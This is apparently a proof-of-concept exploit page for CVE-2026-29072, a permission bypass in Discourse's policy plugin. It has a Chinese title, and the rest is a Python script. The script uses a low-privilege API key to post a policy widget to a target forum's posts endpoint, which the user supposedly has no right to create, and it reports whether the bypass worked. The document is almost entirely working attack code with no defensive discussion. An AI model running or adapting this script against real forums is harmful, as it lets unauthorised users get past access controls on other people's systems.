CVE-2026-29072 Discourse策略插件权限绕过漏洞

import requests # Target configuration URL = "https://target-discourse.com/posts.json" API_KEY = "YOUR_API_KEY" # User API key (low privilege) API_USERNAME = "regular_user" # Payload exploiting the policy widget creation without permission # This simulates creating a post with a policy widget raw_content = """ [input policy-name="test_policy" policy-version="1"] This is a malicious policy widget. [/input] """ payload = { "title": "Exploiting CVE-2026-29072", "raw": raw_content, "category": 1 } headers = { "Api-Key": API_KEY, "Api-Username": API_USERNAME } response = requests.post(URL, data=payload, headers=headers) if response.status_code == 200: print("[+] Policy widget created successfully via privilege bypass.") else: print(f"[-] Failed to create widget. Status: {response.status_code}") print(response.text)